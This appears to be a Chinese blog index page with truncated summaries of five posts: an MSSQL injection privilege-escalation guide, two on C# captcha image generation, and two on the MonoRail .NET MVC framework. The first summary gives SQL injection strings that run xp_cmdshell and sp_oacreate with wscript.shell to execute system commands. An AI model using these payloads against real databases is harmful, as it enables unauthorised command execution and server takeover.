摘要:
MSSQL注入提权思路:SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)相关SQL语句XP_CMDSHELL:数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--Sp_OACreate:数字型;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oameth 阅读全文
摘要:
自从考虑图形验证码之后,http://www.cnblogs.com/FayJack/articles/3063146.html自己又突然有点想法....就是这第二种....<%@ WebHandler Language="C#" Class="CreateCode" %>using System;using System.Web;using System.Drawing;using System.Drawing.Imaging;using System.Web.SessionState;using System.Collections.Ge 阅读全文
摘要:
恶意注册问题,解决办法:验证码....验证码有很多种.个人很多年前写过一种图形验证码.其中第一种就是下边的代码第二组 http://www.cnblogs.com/FayJack/articles/3063155.html费话少说上代码新建一个一般处理程序..即:.ashx文件 如下:CreateCode.ashx<%@ WebHandler Language="C#" Class="CreateCode" %>using System;using System.Web;using System.Drawing;using System.Dr 阅读全文
摘要:
MonoRail是什么? 起源 MonoRail是一个.NET的MVC web开发框架, 原名Castle On Rails, 是CastleProject的一个子项目. 作者hammett在使用过Ruby On Rails后, 觉得非常棒, 他希望在享受ror的开发模式的同时能使用大量现有的资源, 于是就用.NET写出了一个Castle On Rails. 后来ror那边有人抗议说, 把项目名字叫做xxx On Rails是侵权, On Rails不只是它字面上"快捷"的意思, 而是代表了他们的软件开发哲学, 是专有名词... 于是hammett把项目改名成MonoRail了. 现在 阅读全文
摘要:
实例代码下载:/Files/maplye/MonoRailWeb.rar虽然已经有人写了这方面的文章,如:流腥鱼看.net的一个简单的MonoRail例子但是为了阅读的完整性,我还是重新边作了新的实例边写了这篇文章。本实例使用VS2003,实例如下:1.到官方网站下载安装文件,地址如下:http://www.castleproject.org/index.php/Castle:Download目前最新版本Beta5(您也可以不需要下载,直接使用实例代码中lib中的dll)2.添加对Castle.MonoRail.Framework.dllCastle.MonoRail.Framework.Vi 阅读全文